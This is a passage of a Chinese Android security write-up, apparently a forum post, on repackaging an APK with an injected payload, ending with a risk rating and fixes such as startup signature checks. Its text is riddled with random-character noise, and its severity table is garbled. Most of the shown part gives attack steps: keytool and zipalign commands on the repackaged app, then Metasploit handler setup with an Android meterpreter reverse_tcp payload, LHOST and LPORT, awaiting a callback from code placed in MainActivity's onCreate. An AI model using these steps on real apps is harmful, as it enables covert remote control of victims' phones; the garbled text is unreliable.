
! U6 L6 a5 a0 m0 ?& v+ y; ^# _ ; {: F7 s, b& F" } M" h keytool -printcert -jarfile repackaged.apk 9 U' m$ |$ I; ]' c! I! k* g* g- z/ F1 O4 C2 o4 }8 ^- |

# }3 f8 O- e1 B) _) m. f( Y/ n / M; F+ M0 [" S0 h 对齐 & a: o( v* h# S& E/ f , T0 L H5 b8 g, c8 V

' x/ }# c! ~4 @7 L ! Y3 x* `/ Z; Z 字节对齐优化 $ i+ G: h4 N" b/ b' j* D ; Y1 O3 h' t! g

! Q( |' A( X0 [) }! u1 y- P) k4 Y9 U0 F; z1 r zipalign -v 4 repackaged.apk final.apk $ v3 e" Y+ a* I. | : E. s" }7 Y( D# a& J

+ O; O6 M3 t0 b( A$ F Z 9 M% S6 W/ t# t1 P/ I3 O: Q 检查是否对齐 6 t: Z1 Q1 c' ]/ w8 |6 K; q& j , ~* c$ W+ Y8 a/ y( U1 ~! z- n

/ T6 X) Y. J7 j0 M8 }3 A4 o # P; E7 j4 N) F3 l$ ` zipalign -c -v 4 final.apk 1 S$ V) }8 G2 x j : m- R* i% l- H

9 t' u. O3 A! f5 {( P7 R0 A ; r$ e4 w2 L" M8 `# T) C( @; l 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 ; t- O& N9 I+ T) {3 ?! a7 _' ~ - L* N2 Y' ]" Z9 V, ~

- ]- P+ |) Z+ T; j* }; b9 Z/ l6 I. w% | 启动Metasploit控制台，配置参数等待上线 9 u' {/ ~, J& i2 M! Q I" x $ |& w) p' D3 |) r c: m

2 g! g9 c X/ t+ M. S9 ]: u; ~3 ~2 L# p4 a; Q4 S) e 在终端依次输入如下命令 , ~! o+ f1 ^8 J, t/ c : w$ n/ e& u$ P6 Z

% |: \! N6 I, A1 s1 p & g2 y$ }0 h* ?1 B msfconsole 4 a9 L: X" U& e( k! o5 b$ G D( k- C G& X

7 S$ O, m6 S6 l# ` % `1 `- b, Z% F# d: Z# _, x use exploit/multi/handler # r, A% _, C1 M8 E* B# x" ^& [! q$ e& H) r3 n. K: C

4 c" \! A: X3 @4 v$ m ! s$ {$ `5 W z set PAYLOAD android/meterpreter/reverse_tcp 3 W' y/ T9 `3 K! Q9 a 9 _, x2 P' \, U& h& s8 j2 B8 c

h5 [9 p m9 o+ l$ q 4 Z7 ~, i4 q9 h, y7 o set LHOST 192.xxx.xx.xx 0 ~& ^+ U" V5 Y; F3 u w9 C 9 I8 H7 ]* b$ O& e

2 P9 E r0 q% Y0 ~. P: D * U% ^8 I$ X. C1 a1 D set LPORT 4444 ; K- V4 n( u; V. |3 }8 }, a- { " t' J+ ]2 l, ^8 t

: S6 |0 x8 [9 p! C+ ^ H X* O' _$ | / w9 ]& p' B3 a* a; j exploit ( u0 A& i, R5 ~) K h% ]1 I {5 F1 ]4 \! s( Z: v- t: |

# b6 m0 [# _2 T3 u9 k ( z: x1 u x& k6 ^2 `- J: D 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 9 g# |- }+ L. @ & ?; G/ R8 t: E8 h1 x

^; Y$ x( t J0 z, m $ X$ S4 ]. E$ ~ 漏洞危害：中 . L. t# i8 U3 i9 X. T+ ~( j' z0 g8 L) K6 t

: ~; \|% R9 T& m: w1 `- g) y; w* p8 i8 p6 i# N9 ^2 [' y2 U # n( B- L! S( J4 P& J3 M% ]4 o' D& p, n! ? 严重程度 8 L& ?; q+ i' y2 j% m3 i3 H: I. }! b: @# G& K0 D) O : J- ?9 B4 d: x Y* _$ O! S& J* g% `4 X4 p	3 O7 s( T4 a# G, D7 M& S2 F' E {/ c+ C+ k3 s! Y. C " V) f+ \|( ~& F l% o# k1 A# g$ { - U9 O4 ]; E5 Z* F# p 高 3 T2 S) U# ?2 L! C, t2 b& v + D3 s* u# c. U2 y% f ]' m2 G& ]; w( K7 W* ]% L. i3 j( e/ o, F; E2 M1 h3 M	* L; l2 r0 Z+ l! M5 e5 T9 S6 j! Y ( C/ J6 R- ^; h/ J% \0 c . a9 J- N/ {9 z9 [9 J( d" ?1 n/ \|& d; }2 S ■ 1 L; ~( \|# m" B/ ^ 5 [& i5 \|& q* O/ i* q8 ?" o - S& X9 ?& u; c, }( V7 O% M j 3 q3 S. w) ]; b, ^: S	( `7 z5 W0 J# v$ y% C 2 m% I7 [- D" s5 M 6 b! j/ V, o5 z% _6 @6 v8 Z% b: J: B/ J8 o) F6 N 中 / m: E# h0 U8 R6 ]: f0 o# Y6 y- \|' O; I 3 d; u! ^. ^* Z/ Q% C5 \) s - z* K( s* D7 o/ A	% G6 {# _+ s0 G# A/ Y8 P1 c - o2 I( ?; O6 B; t# T, Z/ ] 5 H( f- \|6 K5 m' z% Z- i# t) S2 ^3 W/ s! }% G. K& z8 G0 A : T' k8 T4 ~) W* n( {' J j' J% n( b4 \" S' D8 ], o& B# c. E & e2 e$ A$ U4 `6 J' a+ p$ x _- q8 _ - @; g6 O' ~6 K + g W- L" G: E i5 F2 } $ H- j* \$ _1 C4 \5 C3 }	1 K7 t. J& n9 G# L$ F, n/ g2 U. y ' R! t7 O4 c2 u# m7 m, [! \| ( m% G6 W3 [, p3 w" \| # Z9 H& i7 I& M0 D( B. D 低 " D o, R6 j4 Z" y8 q; ? 7 y) X7 l( y5 O$ H u! _5 n 7 ^7 a, ^/ g' j9 ^. F Q" @7 D5 Q5 U5 \	4 A: n8 b) n1 _: a% N5 ]- \$ t D4 _$ m$ u' Z* C, b. W( E& B R* S# L5 u6 y# ^: z ~2 U4 B& }- c: Z3 L( b ! x4 a9 Y- E# x3 o! S9 Z% t+ N2 l* N$ O7 w' U$ h0 ~2 b m9 _: G% a! P0 F0 C- T0 W* r; f : @# g) C3 p, `+ k. h# r! r% p ) ~; E) C. }6 x5 H3 M$ a4 z5 ` 5 K7 `2 G1 A+ o1 N7 h) a: `: k

/ V4 \# T) g; _' q, Y3 O+ B$ p, G2 ^' X+ l 5 q( A! _( k: n% j , j# v2 r$ _+ Y; a. q

+ W h; I# Y; |" E7 A- F/ `! R2 U2 c2 b6 q$ ? 修复方法： ) S/ _) g0 b5 S. B1 u: P: Q k+ I7 ~% ~1 U7 S/ F# ^; S

: a- [; ?4 i1 i, d3 K. q6 k 2 Q+ h, Y! b7 V7 ^ 1.在 APP 启动时应做签名校验防止二次打包。
$ K3 r7 K \5 Y8 P& @8 x( w0 c 0 G& d8 j( V R. F! x4 Y 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 8 [$ z j! b' c3 R0 B 0 O7 s, v5 p( c- Z* x/ L

8 ~1 S6 {7 p/ b$ Q0 D8 S; @ / z* V7 f8 h- I' y' |& E 8 W5 W6 t2 }5 A& ?) [5 t& t$ ?$ z2 \ 2 S5 w# h6 m! e3 n6 l& T5 z

% H5 h: a. j" y % b! T4 Y* Q. z: y
, u7 U4 A3 w0 o* T) v 7 c% V$ ~. g6 R. T6 D+ ~

		自动登录	找回密码
密码			立即注册